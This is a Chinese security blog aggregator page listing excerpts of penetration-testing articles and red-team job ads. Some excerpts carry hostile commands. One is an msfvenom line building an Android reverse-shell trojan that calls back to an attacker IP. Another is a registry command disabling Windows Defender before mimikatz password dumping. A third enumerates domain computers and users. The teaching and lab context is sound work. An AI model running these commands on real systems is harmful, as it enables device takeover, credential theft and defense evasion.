记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新华三集团诚聘攻防人才!和大牛一起搞站啦!

你和大牛只隔一个工位!有大牛带!和大牛一起搞站!每周技术分享!团队技术氛围好! 公司简介: 新华三集团(简称新华三)是业界领先的数字化解决方案领导者,致力于成为帮助客户业务创新、数字化转型最可信赖的合作伙伴。新华三拥有计算、存储、网络、安全等完整的数字化基础设施提供能力,能够提供云计算、大数据、大互联、大安全、大安防、物联网、边缘计算、人工智能、区块链在内的一站式、全方位数字化平台解决方案。同时,新华三也是HPE®品牌的服务器、存储和技术服务的中国独家提供商。 职位名称: 渗透测试工程师 职责描述: 1、负责渗透测试项目交付; 2、负责攻防演习攻击工作; 3、负责渗透技术研究、赋能。
发布时间:2021-02-22 15:55 | 阅读:5670 | 评论:0 | 标签:安全招聘 web漏洞原理 攻防人才 攻防演习 新华三集团 渗透测试 渗透测试工程师 攻防

全能无线渗透测试工具,一个LAZY就搞定了

近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦。就想看看是否可以有一款功能全面的集合型工具。正所谓功夫不负有心人,还真有这么一个工具出现在我的眼前。它便是名为LAZY script应用于Kali Linux下的执行脚本。该脚本可以自动执行有关Wi-Fi穿透和黑客攻击的绝大部分应用程序,同时它还集合了大量不同类型的攻击程序,可谓是集众家之长于一身。这么好的东西,必须和各位小伙伴一起分享。其实,这样一款好的工具,不仅可以让从事日常安全工作研究变得得心应手,同时对提高无线安全方面的相关学习提供了极大便利。
发布时间:2021-01-22 15:40 | 阅读:9354 | 评论:0 | 标签:渗透测试 渗透

k0otkit:Hack K8s in a K8s Way

文章目录简介Kubernetes环境下的一般渗透过程基本思路基本功能实现迭代一:删除敏感词迭代二:替换Shell为Meterpreter迭代三:无文件化迭代四:分离Payload迭代五:动态容器注入迭代六:解决镜像依赖迭代七:无文件攻击总结攻击者角度防守者角度参考文献往期回顾阅读: 2简介本文涉及到的技术仅供教学、研究使用,禁止用于非法用途。
发布时间:2021-01-11 18:33 | 阅读:17275 | 评论:0 | 标签:安全分享 Kubernetes 渗透测试 hack

使用Ping命令解析主机名解析出来的是IPv6

如果你经常使用ping命令,并身处局域网,那么你肯定会有这样一个疑问:Ping计算机名为何是IPv6地址? 问这个问题的人很少见,大多都是对网络知识稍
发布时间:2021-01-07 21:09 | 阅读:23477 | 评论:0 | 标签:渗透测试

相恨见晚:玩转内网的渗透神器CobaltStrike4

作者:ATL安全团队 来自FreeBuf一、介绍内网渗透的神器工具CobaltStrikeCobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。Cobalt Strike 主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。
发布时间:2020-12-29 16:16 | 阅读:25461 | 评论:0 | 标签:渗透测试 渗透

记一次渗透测试后引发的小扩展

这是 酒仙桥六号部队 的第 122 篇文章。 全文共计2205个字,预计阅读时长7分钟。 背景 在一次授权的渗透测试中,由于使用
发布时间:2020-12-08 12:22 | 阅读:29762 | 评论:0 | 标签:内网渗透 API函数 certutil cmd命令 C语言 js文件 shell wmic wmic os 上传文件

美团红队安全招聘人才!

美团红队安全招聘 1. 岗位要求: a. 统招本科或以上学历,至少2年以上的安全从业经验,能适应运营和运维工作; b. 具备扎实的计算机及安全技术基础(网络、系统、漏洞利用技术原理等方面); c. 具备网络攻防及应急响应的经验,具备较强的分析能力; d. 至少熟练掌握一门编程语言,并针对安全漏洞、防御绕过具备较强的exploit自制能力; e. 务实、自驱,具备良好的协调推动、沟通、团队合作能力。

白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

一、课前声明1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali 与编程,学习更多网络攻防干货!3、Kali 与编程每天准时更新,敬请学习和关注!二、资源装备1.安装好 Kali Linux 的虚拟机一台2.搭建好Sql server的靶机一个;3.整装待发的小白一个。三、 战略安排3.1 进入Metasploit(msf)渗透测试框架,如下图所示。命令:msfconsole3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。命令:search mssql_exec3.3 如下图所示,利用检索到的漏洞利用模块。
发布时间:2020-10-22 15:35 | 阅读:30142 | 评论:0 | 标签:渗透测试 linux 黑客 白帽 攻防

心动网络安全团队高薪招聘

公司介绍 我们是一支热爱游戏、热爱用户、充满个性的团队,也是一支有技术、有梦想、坚持初心的团队。自创业以来,我们坚信可以用科技与艺术,智慧与勇气,让世界变得更加有趣和美好。我们敢于颠覆,突破局限,只为还原游戏本身的乐趣,我们坚持探索,乐于创新,不断尝试去赋予游戏以新的形式。我们始终倾听玩家最真实的需求与心声,打造平等且纯粹的游戏社区,也同样不囿于游戏产业,始终致力于提供优质的综合娱乐服务体验。 招聘岗位 安全运营工程师岗位职责1、安全基础设施的建设与运营,如主机agent、SoC、木马检测、扫描系统、WAF、入侵检测、流量分析等;2、安全系统日志的分析,策略开发与运营;3、安全事件的应急处理。
发布时间:2020-10-09 15:25 | 阅读:289306 | 评论:0 | 标签:安全招聘 安全负责人 安全运营工程师 心动网络 招聘 渗透测试 高薪 网络安全 安全

白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描

课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、Kali与编程每天准时更新,敬请学习和关注!3.1 在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。命令:Win+R/cmd/firewall.cpl3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。命令:service postgresql start3.3 在攻击方Kali Linux主机打开Metasploit(msf)渗透框架,如下图所示。
发布时间:2020-10-01 13:46 | 阅读:51042 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽 网络安全 安全

黑客破解wifi密码-超详细过程

前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问
发布时间:2020-09-29 15:42 | 阅读:62029 | 评论:0 | 标签:渗透测试 黑客 破解

CISCN华东南赛区php健康宝wp&思考

前言 大家好,我是北京联合大学-小帽,也是本题的出题人。熟悉我的朋友们知道,平时喜欢做做欢乐杂项休闲休闲,所以这次的题目算是个披着web皮的半Misc。 由于微信小程序的开发简单、操作方便等优势,很多的公司、部门都喜欢制作小程序简化工作流程。在红蓝对抗、渗透测试等等场景,蓝队的信息中心可能会遗漏小程序这一边界(有可能是某个部门自己找外包做的,信息中心根本不知道它的存在)。而在程序开发过程中,开发者很容易信任某些用户输入,例如直接COPY官方文档中对麦克风、摄像头的操作而忘记了对上传的语音、视频检验。 另:复现可能会上BUUOJ,敬请期待。
发布时间:2020-09-28 12:57 | 阅读:30323 | 评论:0 | 标签:CTF agent CISCN php健康宝 SQL注入漏洞 渗透测试 靶机 PHP

从SQL注入到幸运域控

这是 酒仙桥六号部队 的第 37 篇文章。 全文共计2124个字,预计阅读时长8分钟。 背景 在某个午后,接到上级的任务需要对某个授权的目标进行渗透测试,于是磨刀霍霍向牛羊。 寻找突破口 由于这次给的目标范围很窄,只有两个域名跟两个IP,本来以为突破口不是那么好搞到,但拿到目标站点打开一看,心里稍微松了一口气,通过站点的氛围来看,应该是个运行很多年的系统了。
发布时间:2020-09-24 16:48 | 阅读:45873 | 评论:0 | 标签:内网渗透 asp木马 shell SQL注入 命令socks 哈希 域控 提权 渗透测试 甜土豆 隧道 注入 SQL

一次授权的渗透测试

前言一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内置账户了。既然是thinkphp,习惯性的先试试runtime缓存目录看在不在。不存在。那么看看源代码直接访问static试试目录遍历,试了upload,js等等,也没有翻出一个有用的,那就进管理中心看看吧。首先是留言板随便提交了个图片,返回看详情。这里我开了抓包。
发布时间:2020-09-07 11:58 | 阅读:23967 | 评论:0 | 标签:渗透测试 渗透

xss平台搭建 创建项目没反映 解决办法

xss平台搭建 创建项目没反映解决办法最近有学员反映 第五章漏洞学习与挖掘18课 WEB安全第五章 漏洞学习与利用02xss利用平台搭建 提到的问题 问题原因
发布时间:2020-09-03 00:26 | 阅读:39507 | 评论:0 | 标签:渗透测试 xss

来路不明的安装包请勿安装

前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。受害者安装即可。回到攻击者,启动msfconsole。
发布时间:2020-09-01 10:04 | 阅读:17579 | 评论:0 | 标签:渗透测试

分享10个渗透测试最佳工具的使用方法及下载链接

渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安全和采用更主动的方法。借助专业工具,渗透测试更加有效和高效,以下介绍10种最佳工具。
发布时间:2020-09-01 10:04 | 阅读:33813 | 评论:0 | 标签:渗透测试 渗透

白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要探测网站的地址,需要注意的是这个地址要加上协议,看网站是http还是https。 ②:WorkMethod是选择工作方式,一个是get请求,一个是自动选择。一般选autoswitch的自动选择,它会自行判断是使用head方式或get方式。 ③:NumberofThread是选择扫描线程数,一般为30。电脑配置好的可根据情况选择。 ④:selectscanningtype是选择扫描类型。
发布时间:2020-08-30 09:33 | 阅读:29772 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽

渗透测试工具库

本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinde
发布时间:2020-08-30 09:33 | 阅读:56261 | 评论:0 | 标签:渗透测试 渗透

从Fastjson绕WAF到打穿网闸

这是 酒仙桥六号部队 的第 29 篇文章。 全文共计2160个字,预计阅读时长8分钟。 前言 记述一次授权测试中对某企业进行测试。 PS:渗透过程中的任何敏感信息均已做过脱敏处理,如有雷同,纯属巧合。 外网渗透 通过资产收集,发现了一个XX平台,验证码特别难识别,就没有了爆破的念头。 抓包看发现参数的传递使用了JSON格式。 祭出一个Fastjosn检测的poc,网站把报错页面做了隐藏,只能进行盲打。 把poc地址指向dnslog,查看是否能收到请求。
发布时间:2020-08-28 10:33 | 阅读:94594 | 评论:0 | 标签:脉搏文库 DNSLog fastjson FastJson反序列化漏洞 Maven NPS POC RMi环境 vps

Web渗透测试——验证码自动识别工具

我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种多样的,其中我们常见的验证码就是图片验证码,验证码上的内容包括数字、字母、数字字母混合、汉字、算式等,这些字符往往都不太清晰,主要是为了增加识别难度,避免被软件自动识别。
发布时间:2020-08-22 21:25 | 阅读:46653 | 评论:0 | 标签:渗透测试 渗透 自动

域内特定目标渗透

一、获取域内信息 1 、列出该域内所有机器名 (dsquery computer domainroot -limit 65535 && net group “domain computers” /domain) 2 、列出该域内所有用户名
发布时间:2020-08-21 11:59 | 阅读:22932 | 评论:0 | 标签:渗透测试 渗透

Windows Server 2016抓取明文密码

临时禁止Windows Defender REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force 下载mimikatz后解压缩。
发布时间:2020-08-21 11:59 | 阅读:47887 | 评论:0 | 标签:渗透测试 windows

ZanTI v3.18全功能完美中文版【网络渗透】

简介这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人,替代图片和重导向功能。假设小明正在看某二次元网站,当你使用了替代图片功能,成功劫持以后,便可换成是不是很奈斯,至于第二个功能的话emm,前提你得会建站才能恶搞,就不介绍了。
发布时间:2020-08-18 06:36 | 阅读:71992 | 评论:0 | 标签:渗透测试 渗透

铁头娃的渗透测试

这是 酒仙桥六号部队 的第 12 篇文章。 全文共计1268个字,预计阅读时长5分钟。 前言 争当好青年,疫情期间,坚决执行政府与公司的要求,无奈在家办公的我一如既往的接到了渗透测试的任务。 正篇 话不多说,开干。 01 信息搜集 老规矩,第一步先从信息搜集开始。 对目标进行子域名搜集,并没有发现子域名。 扫描网站目录文件,就一个后台登陆页面,其他什么都没有发现。 之后还进行了nmap端口扫描,也没有发现什么有价值的问题。 没办法,只能正面硬刚了。
发布时间:2020-08-17 17:05 | 阅读:51303 | 评论:0 | 标签:内网渗透 apk文件 Burp misc命令 Proxifier reGeog SQL注入 struts2 webshe

Bash远程解析命令执行漏洞

本文中使用的脚本仅限于学习交流,请勿非法使用,造成的一切后果,均由使用者承担,特此声明。最近在做护网前的内网测试准备,在测试过程中发现内网中存在大量的Bash远程解析命令执行漏洞,说实话这个漏洞有点陈旧了,但是对于渗透测试人员来说,这个漏洞是可以直接获取到目标服务的sehll,闲暇时间进行对此漏洞进行了再一次的复现,并编写了一个比较low的检测脚本和反弹shell的脚本。
发布时间:2020-08-16 19:29 | 阅读:34229 | 评论:0 | 标签:渗透测试 漏洞 远程 执行

黑客大神告诉你:Getshell总结

无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
发布时间:2020-08-12 22:20 | 阅读:36306 | 评论:0 | 标签:渗透测试 黑客 shell

记一次渗透测试从XSS到Getshell过程(详细到无语)

0X00    前言 前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。 0X01    钓鱼 到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。 于是我打开这个站看了一下登陆界面,把登陆界面扒了下来。
发布时间:2020-08-11 17:50 | 阅读:43760 | 评论:0 | 标签:内网渗透 csrf组合拳 Getshell top1w XSS 冰蝎 弱口令 攻防演练 渗透测试 爆破 红队 读取源码

公告

❤人人都能成为掌握黑客技术的英雄⛄️

🧚 🤲 🧜

标签云